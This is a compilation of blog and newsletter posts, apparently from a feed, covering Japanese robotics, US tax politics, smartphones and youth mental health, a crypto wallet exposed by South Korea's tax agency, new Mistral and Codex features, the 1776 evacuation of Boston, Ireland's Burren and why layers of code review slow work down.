But this doesn’t mean China has caught up in the robot industry, or dominated it the way it has dominated the electric vehicle industry. In fact, most of China’s robots are still low-end, mass-market stuff; to produce high-end robots takes many years of careful practice and accumulated tacit know-how.
Japan has this know-how. And so as AI increasingly pushes into robotics, Japan will be an increasingly important partner for the U.S. James Riney of Coral Capital has an excellent post in which he explains why Japan’s robotics expertise is the perfect complement to America’s strength in AI:
If the US wants real, functional robots that can survive a 10,000-hour duty cycle in a factory rather than a 5-minute demo on X/Twitter, Japan is here to the rescue…
The body of a humanoid robot is an engineering nightmare of competing constraints. Strong but lightweight. Blinding speed but sub-millimeter precision. Massive heat dissipation without cooking its own battery. And it needs to do this millions of times without fatigue…This is where Japan excels…
The single biggest misconception in the humanoid hype cycle is the difference between a demo and a deployment…A robot that looks impressive dancing in a pre-programmed video is operating under “Short-Duration Peak Performance.” It pushes its motors and gears to the limit for a few minutes. But industrial customers don’t buy demos….A robot on [a production] line needs a Mean Time Between Failures of 5,000 to 10,000 hours…This is the Reliability Cliff. Most entrants from the software-first ecosystem, and many low-cost Chinese clones, fall off this cliff at around the 1,000-hour mark. Their gears develop backlash, their lubricants break down, and their positional accuracy drifts…
Japanese companies like Harmonic Drive Systems and Nabtesco have spent fifty years solving these problems. They have mastered the black art of tribology, metallurgy, and heat treatment…If you peel back the skin of almost any high-end robot today, whether it is building cars in Germany or sorting packages in an Amazon warehouse, you will find Japanese logos inside…According to Japan’s Ministry of Economy, Trade and Industry (METI), Japanese manufacturers hold an impressive 70% of the global market share for industrial robots…
The battle for robotics dominance is not a story of the US vs China. China would likely win that battle. It is a story of the US & Japan (and allies) vs China…For now, and for the foreseeable future, if you want a robot that works, you need to knock on Japan’s door.
Wise words. American startups, AI companies, and government agencies need to listen to James.
There has been a big political realignment in the U.S. — and in many other countries — in recent years. Center-left parties, like the Democrats in the U.S. and Labour in the UK, used to primarily be the parties of the working class. But in recent years, their voter bases have shifted — they have become the parties of educated high-earning professionals, while working-class voters have drifted to the right. Here’s Rogé Karma:
In 2008, the top fifth of earners favored Democrats by just a few percentage points; by 2020, they were the group most likely to vote for Democrats and did so by a nearly 15-point margin. (Democrats won the poorest fifth of voters by a similarly large margin.) Democrats now represent 24 of the 25 highest-income congressional districts and 43 of the top 50 counties by economic output. A similarly stark shift has occurred if you look at college education rather than income. Perhaps most dramatic of all has been the change among wealthy white people. Among white voters, in every presidential election from 1948 until 2012, the richest 5 percent were the group most likely to vote Republican, according to analysis by the political scientist Thomas Wood. In 2016 and 2020, this dynamic reversed itself: The top 5 percent became the group most likely to vote Democratic.
And here’s a chart:

For the most part, Democrats have kept their pro-working-class politics, even as they represent the working class less and less. They’ve supported unions even as unions have abandoned them at the polls. They’ve pushed for more welfare and health spending, even as the benefits have flowed more to red states than to blue ones. This is commendable.
However, this class altruism doesn’t extend to all types of policy. Progressives have fought hard for student debt cancellation, even though people who go to college are pretty obviously the main beneficiaries of that. And on taxes, Democrats have shifted from their old strategy of taxing the rich to a new strategy of taxing only the hyper-rich while cutting taxes for the merely-rich. Matt Yglesias reports:
Chris Van Hollen and Cory Booker both recently introduced proposals to raise taxes on the very rich in order to finance broad-based tax cuts for the rest of the country…[T]he existing progressive structure of the income tax code means that any broad-based income tax cut is going to be regressive. Check out this Yale Budget Lab estimate of Van Hollen’s plan — he makes sure to soak the rich, but he does more with the money for the comfortable than for the struggling. Booker’s plan is even worse in this regard…
[L]ooking at the distributional tables for the 1993 budget…that Bill Clinton signed…it’s almost shocking how broadly he raised taxes…[B]y Obama’s time, willingness to enact broad-based tax increases was waning…Obama vowed not to raise taxes on anyone earning less than $250,000 (roughly $360,000 in today’s dollars), which meant in practice being willing to extend a majority of the Bush tax cuts…Except vulnerable senate Democrats lost their nerve and pushed to extend tax cuts up to $450,000 — or nearly $650,000 adjusted for inflation today.
Basically, as Democrats have become the party of the somewhat-rich, they have begun to embrace tax cuts for the somewhat-rich.
But without broad-based taxes, America will never be able to rein in its deficit or increase the welfare state further. Billionaires have a ton of money individually, but collectively there just aren’t enough of them to support the fiscal needs of a country like the United States. If we want broadly shared benefits, we will need broadly shared sacrifice.
The Democrats, comfortable in their newfound identity of the party of millionaires-against-billionaires, are no longer calling for broadly shared sacrifice. Instead, the best populism they can seem to muster is an attack on one group of elites by another group of elites.
“Blow up your TV/ Throw away your paper/ Go to the country/ Build you a home/ Plant a little garden/ Eat a lot of peaches/ Try and find Jesus/ On your own” — John Prine
I’m generally a techno-optimist, but I make an exception for at least one technology: smartphone-enabled social media. In the long run, I expect us to be able to adapt in order to use this technology to our net benefit. But in the short run, I think it has devastated our politics, destroyed many of our social bonds, and made us less happy in general.
A research project called the Global Mind Project has tried to assess mental health across the globe, using a huge survey with millions of respondents. Their latest report zeroes in on the deleterious effects that smartphone usage has had on the well-being of Gen Z. Here’s Jonathan Haidt’s summary:
Young adults used to generally have good mental health, compared to older generations. But now, in ALL countries examined, they are doing badly compared to older generations in that country…The decline of young people's mental health is "most pronounced in the wealthier and more developed countries." They note that it is in such countries that smartphones are given earliest, junk food is most heavily consumed, spirituality is most diminished, and family ties are looser and often weaker…"A younger age of first smartphone ownership is associated with increased suicidal thoughts, aggression, and other problems in adulthood."
And this is from the report itself:
GenZ is the first generation to grow up with a smartphone. Among this group, the younger they acquired their first smartphone in childhood, the more likely they are to have struggles as adults. These struggles extend beyond sadness and anxiety to less discussed symptoms, such as a sense of being detached from reality, suicidal thoughts, and aggression towards others…Excessive time spent on smartphones also diminishes the development of social cognition that requires learned interpretation of facial expressions, body language, and group dynamics. The negative impacts are particularly sharp below age 13.
Fortunately, some young people seem to be realizing that the phones are bad for them. Here’s a recent story from CNBC:
Going chronically offline is the latest trend to grip young people, and ironically it's going viral on social media…I received nearly 100 responses from Gen Z and millennials sharing stories about social media detoxes and digital burnout…They talked about ditching their smartphones for flip phones, visiting record stores to buy vinyl, taking up analog hobbies like knitting, and most importantly, connecting with their friends in person.
A 2025 Deloitte consumer trends survey of more than 4,000 Brits found that nearly a quarter of all consumers had deleted a social media app in the previous 12 months, rising to nearly a third for Gen Zers…Meanwhile, social media use has steadily declined since time spent on the platforms peaked in 2022, according to an analysis of the online habits of 250,000 adults in more than 50 countries by the Financial Times and digital audience insights firm GWI…Globally, adults 16 and over spent an average of two hours and 20 minutes per day on social platforms by the end of 2024, down almost 10% since 2022, the report found. The decline was particularly pronounced among teens and 20-somethings…
Young people who are deleting their social media platforms cite the increasing pressures of being online as well as damage to their mental health as causes…Deloitte’s consumer survey showed that almost a quarter of respondents who deleted social apps reported these apps had negatively impacted their mental health and consumed too much of their time.
This is actually the kind of thing that makes me such a techno-optimist. In the short-run, the drawbacks of a new technology can do more harm than good. But in the long run, humans learn and adapt to the new technology. And in the case of smartphones, the right adaptation may simply be to get off social media.
1. “Absolutely astounding figures from the NY state comptroller: spending on services for the NYC street homeless population ran to $81,705 per person last year, up from $28,428 pp 6yrs ago. Figures do not include all kinds of other spending, supportive housing, policing costs etc.” Link here.
2. Backlash against The Giving Pledge (NYT).
3. Poor weather when touring a college campus reduces a student’s chance of applying.
4. Where do AI agents settle their payments?
5. Even Nevada never had that much of a real estate bubble?
6. Prediction markets turn many people into unwilling referees. Good and interesting piece.
7. GPT Pro on the value of introspection. “The literature does not really say “successful people are introspective.” It says: successful people are better at turning reflection into accurate self-insight, external calibration, and better next actions.”
NB: The passing of Coetzee is now not confirmed.
The post Tuesday assorted links appeared first on Marginal REVOLUTION.
An expensive mistake:
Someone jumped at the opportunity to steal $4.4 million in crypto assets after South Korea’s National Tax Service exposed publicly the mnemonic recovery phrase of a seized cryptocurrency wallet.
The funds were stored in a Ledger cold wallet seized in law enforcement raids at 124 high-value tax evaders that resulted in confiscating digital assets worth 8.1 billion won (currently approximately $5.6 million).
When announcing the success of the operation, the agency released photos of a Ledger device, a popular hardware wallet for crypto storage and management.
However, the images also showed a handwritten note of the wallet recovery phrase, which serves as the master key that allows restoring the assets to another device.
The authorities failed to redact that info, allowing anyone to transfer into their account the assets in the cold wallet.
Reportedly, shortly after the press release was published, 4 million Pre-Retogeum (PRTG) tokens, worth approximately $4.8 million at the time, were transferred out of the confiscated wallet to a new address.
Another small adventure in publishing:)
Here's the pre-publication review of Moral Economics from Publisher's Weekly. "
TL;DR "Bringing balanced, evidence-based analyses to emotionally fraught debates, Roth reveals the power of markets to inspire solutions. This is trailblazing"
Moral Economics: From Prostitution to Organ Sales, What Controversial Transactions Reveal About How Markets Work
Alvin E. Roth. Basic Venture, $35 (368p) ISBN 978-1-5417-0201-1
"Nobel Prize–winning economist Roth (Who Gets What—and Why) delivers a stimulating study of morally contested products and services, such as abortion, assisted suicide, and marijuana. He refers to these as “repugnant transactions,” as they spark objections primarily on religious or moral grounds but don’t cause easily measurable harms to those seeking to ban them. Viewing these transactions as markets, or systems that can be designed to “allocate scarce resources efficiently and equitably,” can help people make progress on challenging topics, he argues. For example, analyses of legal prostiution show it can increase the market for paid sex but can also reduce rape and the spread of sexually transmitted disease. Another topic discussed is kidney donation. There is a nearly universal ban on compensating donors based on the concern that payments might lead to poor or vulnerable people being coerced into selling their organs. Meanwhile, there is an extreme shortage of donors, and loved ones are often incompatible with those they want to help (kidney disease runs in families). Roth and his colleagues designed a kidney exchange, in which incompatible patient-donor pairs exchange kidneys with other such pairs. Because no money changes hands, the problem of paying donors can be avoided. Bringing balanced, evidence-based analyses to emotionally fraught debates, Roth reveals the power of markets to inspire solutions. This is trailblazing. (May)

Since living requires choosing, we will always feel regret about the paths not taken. But what matters is the future we forge
- by Tasha Kleeman
That is the topic of my latest column for The Free Press, here is the closing tag:
The biggest risk is not from the AI companies, but rather that the government with the most powerful AI systems becomes the bad guy itself. The U.S., on the world stage, is not always a force for good, and we might become worse to the extent we can act without constraint. The Vietnam War is perhaps the least politically controversial way of demonstrating that point.
So today we need an odd and complex mix of not entirely consistent ideologies for the current arms race to go well. How about some tech accelerationism mixed with capitalism, and then a prudent technocratic approach to military procurement, to make sure those advances serve national security ends? On the precautionary side, we need a dash of the 1960s and ’70s New Left and libertarian anti-war ideologies, skeptical of Uncle Sam himself. We do not want to become the bad guys.
Do you think we can pull that off? The new American challenge is underway.
Worth a ponder.
The post The AI arms race appeared first on Marginal REVOLUTION.
Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model.
It supports reasoning_effort="none" or reasoning_effort="high", with the latter providing "equivalent verbosity to previous Magistral models".
The new model is 242GB on Hugging Face.
I tried it out via the Mistral API using llm-mistral:
llm install llm-mistral
llm mistral refresh
llm -m mistral/mistral-small-2603 "Generate an SVG of a pelican riding a bicycle"

I couldn't find a way to set the reasoning effort in their API documentation, so hopefully that's a feature which will land soon.
Also from Mistral today and fitting their -stral naming convention is Leanstral, an open weight model that is specifically tuned to help output the Lean 4 formally verifiable coding language. I haven't explored Lean at all so I have no way to credibly evaluate this, but it's interesting to see them target one specific language in this way.
Tags: ai, generative-ai, llms, llm, mistral, pelican-riding-a-bicycle, llm-reasoning, llm-release
Use subagents and custom agents in Codex
Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag.They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel.
Codex also lets you define custom agents as TOML files in ~/.codex/agents/. These can have custom instructions and be assigned to use specific models - including gpt-5.3-codex-spark if you want some raw speed. They can then be referenced by name, as demonstrated by this example prompt from the documentation:
Investigate why the settings modal fails to save. Have browser_debugger reproduce it, code_mapper trace the responsible code path, and ui_fixer implement the smallest fix once the failure mode is clear.
The subagents pattern is widely supported in coding agents now. Here's documentation across a number of different platforms:
Update: I added a chapter on Subagents to my Agentic Engineering Patterns guide.
Via @OpenAIDevs
Tags: ai, openai, generative-ai, llms, coding-agents, codex-cli, parallel-agents, agentic-engineering
Average grades continue to rise in the United States, raising the question of how grade inflation impacts students. We provide comprehensive evidence on how teacher grading practices affect students’ long-run success. Using administrative high school data from Los Angeles and from Maryland that is linked to postsecondary and earnings records, we develop and validate two teacher-level measures of grade inflation: one measuring average grade inflation and another measuring a teacher’s propensity to give a passing grade. These measures of grade inflation are distinct from teacher value-added, with grade inflating teachers having moderately lower cognitive value-added and slightly higher noncognitive value-added. These twomeasuresalso differentially impact students’ long-term outcomes. Being assigned a higher average grade inflating teacher reduces a student’s future test scores, the likelihood of graduating from high school, college enrollment, and ultimately earnings. In contrast, passing grade inflation reduces the likelihood of being held back and increases high school graduation, with limited long-run effects. The cumulative impact is economically significant: a teacher with one standard deviation higher average grade inflation reduces the present discounted value of lifetime earnings of their students by $213,872 per year.
That is from a recent paper by Jeffrey T. Denning, Rachel Nesbit, Nolan Pope, and Merrill Warnick. Via Séb Krier.
The post Claims about grade inflation appeared first on Marginal REVOLUTION.
In early 1775, the people of Boston were bitterly divided. The town was on a peninsula that was almost an island, connected only by a narrow spit of land on which four horses could walk abreast at high tide. There, and on the surrounding lands—Medford, Charlestown, Cambridge, Brookline, Roxbury, Dorchester Heights, Noddle Island, and Governor’s Island—and in the vessels in Boston Harbor and beyond, men, women, and children were weighing their loyalties.
Trouble had been brewing in the town for at least three years. On the one side were British soldiers and the loyalist subjects of the Crown called Tories. Challenging them were the civilians called Patriots. They wanted to restore the traditional rights of Englishmen that were under attack in the colonies. After the Patriots had thrown more than 300 chests of valuable tea into Boston Harbor on December 16, 1773, to protest Parliament’s claim that it had the right to tax the colonists without their consent, officials from the British government had set out to make the Patriots do as they were told.
They sent 10,000 soldiers and their families to Boston, where the lower-class soldiers competed for housing with the locals. Sometimes soldiers deserted and took local jobs, which had grown scarce as the occupation ruined the local economy. There was little love lost between the Boston colonists and the soldiers newly arrived from England.
Loyalties were less clear among the wealthier people in Boston. While poorer Patriots and soldiers jostled in the streets, British officers and loyalist Tories mingled in places like the fashionable London Book Store on Cornhill Street. There the young bookseller, 25-year-old Henry Knox, had on his shelves the latest volumes from the other side of the Atlantic. Knox was well read himself and was fascinated by military strategy and tactics, an interest he fed through his book orders and by chatting with the soldiers who came to his shop.
Knox brought his military knowledge to his support for the Patriot cause. But his political loyalties did not diminish his admiration for Lucy Flucker, the daughter of prominent and wealthy Tories, when she came with the other fashionable young women to his bookshop. She returned his admiration, and the two married in June 1774 despite her parents’ objection to Henry due to his politics. Her parents reluctantly allowed their daughter to marry but disowned her of her inheritance.
The battles of Lexington and Concord on April 19, 1775, meant that Bostonians could no longer be neutral in the growing tension between the Tories and the Patriots. They would have to choose where their loyalties lay: with the Patriots trying to protect their traditional rights or with the Tories claiming the king had new, radical powers that override the rights of Englishmen.
Even before the British soldiers made it back down the Battle Road from Concord on April 19, militiamen—both white and Black, free and enslaved—from the Massachusetts countryside, furious that soldiers of their own government had shot at them and killed their neighbors, rushed to surround Boston, laying siege to the soldiers and British officials there. Townspeople like Henry and Lucy Knox had to decide where to place their loyalties.
It was not an easy question. In May the Second Continental Congress sent the Olive Branch Petition asking King George for reconciliation, a petition the king rejected, and in June, British general Thomas Gage declared Massachusetts to be in a state of rebellion but offered amnesty for all who would lay down their arms…except for Patriot leaders Samuel Adams and John Hancock. If the Patriots failed, association with them could mean prison or worse.
With his ties to the town’s Tories—including his wife’s family—and knowledge of artillery, Knox could have found a position with the British. Instead, he chose the Patriots. He escaped Boston to join the men besieging the town, helping his comrades build fortifications around the city. Lucy chose to flee with him, leaving her family behind. While Henry camped near Boston, Lucy moved around, alone and unsettled, from the homes of friends to rented rooms in Worcester.
The standoff in Boston began to force others to take a stand as well. Everyone knew that Fort Ticonderoga, 300 miles away near the confluence of Lake Champlain and Lake George in New York, was fortified with heavy cannons that could make or break a battle, and that they were guarded by only a small detachment of two officers and forty-eight men, most of whom were unfit for regular military service.
In May 1775, British General Thomas Gage warned the governor of Quebec he must fortify the Ticonderoga fort at about the same time the Massachusetts Provincial Congress authorized Benedict Arnold of Connecticut to raise men to capture the cannons. Arnold knew that area well, and he and his men set out. Connecticut also raised militiamen to seize the fort, and Vermont’s Green Mountain Boys, led by Ethan Allen, were already on their way. The forces came together and worked their way through the woods to the fort. At dawn on May 10, nine days before the governor of Quebec received Gage’s letter, the Patriots captured Fort Ticonderoga in a surprise attack that found the defenders asleep in their beds. The Patriots seized more than 180 cannons and other weapons.
While the militiamen repaired and strengthened the fort, lines around Boston were hardening. From England, military reinforcements of 4,500 men, led by three new commanders including Sir William Howe, arrived in Boston. Because ships of the British navy and Tory allies controlled the harbor, protecting the soldiers in the town and bringing in supplies, the Patriots could not advance.
But neither could the British officials. British soldiers seized Charlestown at the Battle of Bunker Hill on June 17, but their victory did not settle anything. The British took heavy casualties and did not break the Patriots’ lines, teaching the Patriots that they could hold off the British Army.
The leaders of the Second Continental Congress in Philadelphia recognized the importance of events in Boston. They took control of the forces surrounding the town and created the Continental Army. Recognizing that the Patriots’ reputation for radicalism worried tentative supporters, Massachusetts leader John Adams proposed appointing George Washington of Virginia “General and Commander in Chief.”
Washington arrived at Cambridge to take command in July. He and Henry Knox became fast friends as the two sides in and around Boston settled down into local skirmishes. As the British restricted guns in the town, most Patriots left, joining the Continental Army growing outside the town. Riflemen and militias arrived from Virginia, Maryland, Pennsylvania, and New Jersey, as well as the New England colonies: Rhode Island, New Hampshire, Connecticut, and the Green Mountains.
Continental soldiers dug trenches and drilled, turning from militia into trained soldiers. At the same time, loyalists from the countryside took refuge in the city, where people went without food or wood for cooking and heating, and horses grew gaunt without enough hay. But because the British could bring in supplies over water, the town held on.
By fall, it was not at all clear that the Patriot cause would survive. The Patriots had allies in the fishermen who harassed British shipping, but while shortages squeezed Boston’s inhabitants, the British soldiers had dug in. There was no sign they could be dislodged, and the enlistments of the Continental soldiers would expire at the end of the year. If the Patriots couldn’t rid Boston of the British soldiers and their Tory allies, the revolution might well die in its cradle.
Knox had developed a plan to retrieve the cannons from Fort Ticonderoga, and in November Washington ordered him to go ahead. Knox made the trip quickly, arriving on December 5 at Ticonderoga, where he selected 59 cannons, mortars, and howitzers to transport back to Boston.
It would not be easy. Some of the cannons weighed more than 5,000 pounds each, and together they weighed about 60 tons. Knox’s men loaded the weaponry on handmade barges to cross 32 miles of Lake George before it turned to ice, then carpenters on Knox’s crew built “42 exceeding strong sleds.” Knox rented horses to drag the sleds, laden with artillery, to Albany. Snow made it easier to move the cannons across the land, but the ice on the rivers was so thin the sleds crashed through it twice. The men recovered all but one of the weapons from the icy water, helped by locals who supported the cause.
What Knox called “a noble train of artillery” continued into Massachusetts and crossed over the Berkshires, into the Connecticut River Valley, and on to Worcester, where Henry got to see Lucy. Finally, after ten grueling weeks, on January 25, John Adams reported seeing the cannons pass through Framingham, where they were outfitted for new service. In early March, Knox delivered the cannons to Washington in Cambridge.
Washington placed some of the cannons at Lechmere’s Point and at high points in Cambridge and Roxbury to fire on the town while the Patriots moved the rest of the cannons to Dorchester Heights. From there, Continental soldiers could threaten not only the soldiers in the Tory town, but also, at last, the warships in Boston Harbor.
On March 2, 3, and 4, the British soldiers and Washington’s men traded fire as Continental soldiers built defenses out of timber and brush out of sight of British spyglasses. And then, on the night of March 5, under cover of darkness, the Patriots moved their guns and defenses into position on Dorchester Heights.
“My God,” General Howe said when he saw the fortifications. “These fellows have done more work in one night than I could make my army do in three months.” The British shot at the defenses, but their shot fell short. Remaining loyalists in town wrote a letter to Washington, promising him that the British would not burn the town if the Patriots would let them leave unmolested. Washington agreed.
General Howe ordered the soldiers to torch the town if anyone disturbed their departure. On March 10, he began to load the British ships with soldiers and the Loyalists who wanted to go with them, including Lucy Knox’s parents, who would never see their daughter again. For a week, March winds battered at the loaded ships, keeping them trapped in the harbor. Finally, at 4:00 am on March 17, 120 ships carrying more than 10,000 soldiers and more than 1,000 Tories weighed anchor and left Boston.
That evacuation, 250 years ago tomorrow, was a major victory for Washington and the Continental soldiers, illustrating that a ragtag bunch of countrymen and women, working together, could beat the military might of the British army and navy when it turned against its own people. Watching the British retreat reinvigorated the Patriots after a discouraging winter and gave them confidence that their determination to protect their rights was not only a just cause, but a winning one.
The ships sailing out of Boston Harbor helped solidify that message. They carried the town’s Tories with them, enabling the Patriots to strengthen their community and spread their principles of independence to previously unaligned neighbors without either British officials or reactionary neighbors silencing them.
What began in Boston spread across the colonies as neighbors brought their carpentry and maritime skills, cooking and medical understanding, military tactics, and endurance to the cause of liberty. The evacuation of Boston had taught them that if they worked together, those skills would be enough to rout the world’s strongest military.
Less than four months after the British ships left Boston Harbor, the Patriots took the extraordinarily daring step of declaring independence from the King. They signed a document pledging to each other that they would dedicate their Lives, their Fortunes and their sacred Honor to creating a brand new nation.
[Map of Boston in 1775, from the Library of Congress, Geography and Map Division]
Today’s story is the answer to the March 2026 puzzler.
Though Ireland is known for the many shades of green that grace its grassy pastoral landscapes, there’s one corner of the Emerald Isle where gray reigns supreme. In the Burren region, on the island’s west coast, what geologists describe as limestone pavement covers much of the rocky, treeless landscape.
The OLI (Operational Land Imager) on Landsat 8 captured this view of the Burren on May 16, 2025. The fossil-rich limestone that makes up the gray outcrops was deposited about 325 million years ago during the Carboniferous Period, when what is now Ireland lay near the equator beneath warm, shallow seas. Although the limestone was initially deposited in flat, horizontal layers on the seafloor, it later buckled into gentle arch- and trough-shaped folds as tectonic plates collided during a mountain-building episode known as the Variscan Orogeny.
These folds in the tilted rock layers and differences in their rate of erosion produced the terraced appearance that defines the Burren’s hills, with more erosion-resistant layers of rock persisting as ledges. Glacial activity also played a role in sculpting the landscape, scraping away soil and sediment to expose the limestone pavement and smoothing the region’s hills.
Limestone is prone to chemical weathering that produces an irregular terrain known as karst, pockmarked with sinkholes, caves, and fissures called grikes. Many grikes in the Burren collect soil and have become footholds where vegetation grows in the otherwise rocky landscape.
Individual grikes are too small to see in Landsat imagery, but networks of them have aligned along the rock layers, contributing to the concentric vegetation patterns visible in the image. Among the plants that you might find growing in them is the shamrock, the three-leaved clover that has become a symbol of Ireland.
With some luck, Trifolium dubium or Trifolium repens may even be found amidst the shamrock-shaped contours of Moneen Mountain, a 262-meter (860-foot) limestone hill visible in the image above. While there’s hardly consensus about what species is the true inspiration for shamrocks, these two clover species were among the favorites when Irish botanists were surveyed about the topic in the 1880s, according to the Carnegie Museum of Natural History.
NASA Earth Observatory images by Lauren Dauphin, using Landsat data from the U.S. Geological Survey. Story by Adam Voiland.
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The colorful formations found in this bowl-shaped escarpment in southwestern Utah are the centerpiece of Cedar Breaks National Monument.

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We’ve all heard of those network effect laws: the value of a network goes up with the square of the number of members. Or the cost of communication goes up with the square of the number of members, or maybe it was n log n, or something like that, depending how you arrange the members. Anyway doubling a team doesn't double its speed; there’s coordination overhead. Exactly how much overhead depends on how badly you botch the org design.
But there’s one rule of thumb that someone showed me decades ago, that has stuck with me ever since, because of how annoyingly true it is. The rule is annoying because it doesn’t seem like it should be true. There’s no theoretical basis for this claim that I’ve ever heard. And yet, every time I look for it, there it is.
Here we go:
Every layer of approval makes a process 10x slower
I know what you're thinking. Come on, 10x? That’s a lot. It’s unfathomable. Surely we’re exaggerating.
Nope.
Just to be clear, we're counting “wall clock time” here rather than effort. Almost all the extra time is spent sitting and waiting.
Look:
Code a simple bug fix
30 minutes
Get it code reviewed by the peer next to you
300 minutes → 5 hours → half a day
Get a design doc approved by your architects team first
50 hours → about a week
Get it on some other team’s calendar to do all that
(for example, if a customer requests a feature)
500 hours → 12 weeks → one fiscal quarter
I wish I could tell you that the next step up — 10 quarters or about 2.5 years — was too crazy to contemplate, but no. That’s the life of an executive sitting above a medium-sized team; I bump into it all the time even at a relatively small company like Tailscale if I want to change product direction. (And execs sitting above large teams can’t actually do work of their own at all. That's another story.)
AI can’t fix this
First of all, this isn’t a post about AI, because AI’s direct impact on this problem is minimal. Okay, so Claude can code it in 3 minutes instead of 30? That’s super, Claude, great work.
Now you either get to spend 27 minutes reviewing the code yourself in a back-and-forth loop with the AI (this is actually kinda fun); or you save 27 minutes and submit unverified code to the code reviewer, who will still take 5 hours like before, but who will now be mad that you’re making them read the slop that you were too lazy to read yourself. Little of value was gained.
Now now, you say, that’s not the value of agentic coding. You don’t use an agent on a 30-minute fix. You use it on a monstrosity week-long project that you and Claude can now do in a couple of hours! Now we’re talking. Except no, because the monstrosity is so big that your reviewer will be extra mad that you didn’t read it yourself, and it’s too big to review in one chunk so you have to slice it into new bite-sized chunks, each with a 5-hour review cycle. And there’s no design doc so there’s no intentional architecture, so eventually someone’s going to push back on that and here we go with the design doc review meeting, and now your monstrosity week-long project that you did in two hours is... oh. A week, again.
I guess I could have called this post Systems Design 4 (or 5, or whatever I’m up to now, who knows, I’m writing this on a plane with no wifi) because yeah, you guessed it. It's Systems Design time again.
The only way to sustainably go faster is fewer reviews
It’s funny, everyone has been predicting the Singularity for decades now. The premise is we build systems that are so smart that they themselves can build the next system that is even smarter, that builds the next smarter one, and so on, and once we get that started, if they keep getting smarter faster enough, then the incremental time (t) to achieve a unit (u) of improvement goes to zero, so (u/t) goes to infinity and foom.
Anyway, I have never believed in this theory for the simple reason we outlined above: the majority of time needed to get anything done is not actually the time doing it. It’s wall clock time. Waiting. Latency.
And you can’t overcome latency with brute force.
I know you want to. I know many of you now work at companies where the business model kinda depends on doing exactly that.
Sorry.
But you can’t just not review things!
Ah, well, no, actually yeah. You really can’t.
There are now many people who have seen the symptom: the start of the pipeline (AI generated code) is so much faster, but all the subsequent stages (reviews) are too slow! And so they intuit the obvious solution: stop reviewing then!
The result might be slop, but if the slop is 100x cheaper, then it only needs to deliver 1% of the value per unit and it's still a fair trade. And if your value per unit is even a mere 2% of what it used to be, you’ve doubled your returns! Amazing.
There are some pretty dumb assumptions underlying that theory; you can imagine them for yourself. Suffice it to say that this produces what I will call the AI Developer’s Descent Into Madness:
Whoa, I produced this prototype so fast! I have super powers!
This prototype is getting buggy. I’ll tell the AI to fix the bugs.
Hmm, every change now causes as many new bugs as it fixes.
Aha! But if I have an AI agent also review the code, it can find its own bugs!
Wait, why am I personally passing data back and forth between agents
I need an agent framework
I can have my agent write an agent framework!
Return to step 1
It’s actually alarming how many friends and respected peers I’ve lost to this cycle already. Claude Code only got good maybe a few months ago, so this only recenlty started happening, so I assume they will emerge from the spiral eventually. I mean, I hope they will. We have no way of knowing.
Why we review
Anyway we know our symptom: the pipeline gets jammed up because of too much new code spewed into it at step 1. But what's the root cause of the clog? Why doesn’t the pipeline go faster?
I said above that this isn’t an article about AI. Clearly I’m failing at that so far, but let’s bring it back to humans. It goes back to the annoyingly true observation I started with: every layer of review is 10x slower. As a society, we know this. Maybe you haven't seen it before now. But trust me: people who do org design for a living know that layers are expensive... and they still do it.
As companies grow, they all end up with more and more layers of collaboration, review, and management. Why? Because otherwise mistakes get made, and mistakes are increasingly expensive at scale. The average value added by a new feature eventually becomes lower than the average value lost through the new bugs it causes. So, lacking a way to make features produce more value (wouldn't that be nice!), we try to at least reduce the damage.
The more checks and controls we put in place, the slower we go, but the more monotonically the quality increases. And isn’t that the basis of continuous improvement?
Well, sort of. Monotonically increasing quality is on the right track. But “more checks and controls” went off the rails. That’s only one way to improve quality, and it's a fraught one.
“Quality Assurance” reduces quality
I wrote a few years ago about W. E. Deming and the "new" philosophy around quality that he popularized in Japanese auto manufacturing. (Eventually U.S. auto manufacturers more or less got the idea. So far the software industry hasn’t.)
One of the effects he highlighted was the problem of a “QA” pass in a factory: build widgets, have an inspection/QA phase, reject widgets that fail QA. Of course, your inspectors probably miss some of the failures, so when in doubt, add a second QA phase after the first to catch the remaining ones, and so on.
In a simplistic mathematical model this seems to make sense. (For example, if every QA pass catches 90% of defects, then after two QA passes you’ve reduced the number of defects by 100x. How awesome is that?)
But in the reality of agentic humans, it’s not so simple. First of all, the incentives get weird. The second QA team basically serves to evaluate how well the first QA team is doing; if the first QA team keeps missing defects, fire them. Now, that second QA team has little incentive to produce that outcome for their friends. So maybe they don’t look too hard; after all, the first QA team missed the defect, it’s not unreasonable that we might miss it too.
Furthermore, the first QA team knows there is a second QA team to catch any defects; if I don’t work too hard today, surely the second team will pick up the slack. That's why they're there!
Also, the team making the widgets in the first place doesn’t check their work too carefully; that’s what the QA team is for! Why would I slow down the production of every widget by being careful, at a cost of say 20% more time, when there are only 10 defects in 100 and I can just eliminate them at the next step for only a 10% waste overhead? It only makes sense. Plus they'll fire me if I go 20% slower.
To say nothing of a whole engineering redesign to improve quality, that would be super expensive and we could be designing all new widgets instead.
Sound like any engineering departments you know?
Well, this isn’t the right time to rehash Deming, but suffice it to say, he was on to something. And his techniques worked. You get things like the famous Toyota Production System where they eliminated the QA phase entirely, but gave everybody an “oh crap, stop the line, I found a defect!” button.
Famously, US auto manufacturers tried to adopt the same system by installing the same “stop the line” buttons. Of course, nobody pushed those buttons. They were afraid of getting fired.
Trust
The basis of the Japanese system that worked, and the missing part of the American system that didn’t, is trust. Trust among individuals that your boss Really Truly Actually wants to know about every defect, and wants you to stop the line when you find one. Trust among managers that executives were serious about quality. Trust among executives that individuals, given a system that can work and has the right incentives, will produce quality work and spot their own defects, and push the stop button when they need to push it.
But, one more thing: trust that the system actually does work. So first you need a system that will work.
Fallibility
AI coders are fallible; they write bad code, often. In this way, they are just like human programmers.
Deming’s approach to manufacturing didn’t have any magic bullets. Alas, you can’t just follow his ten-step process and immediately get higher quality engineering. The secret is, you have to get your engineers to engineer higher quality into the whole system, from top to bottom, repeatedly. Continuously.
Every time something goes wrong, you have to ask, “How did this happen?” and then do a whole post-mortem and the Five Whys (or however many Whys are in fashion nowadays) and fix the underlying Root Causes so that it doesn’t happen again. “The coder did it wrong” is never a root cause, only a symptom. Why was it possible for the coder to get it wrong?
The job of a code reviewer isn't to review code. It's to figure out how to obsolete their code review comment, that whole class of comment, in all future cases, until you don't need their reviews at all anymore.
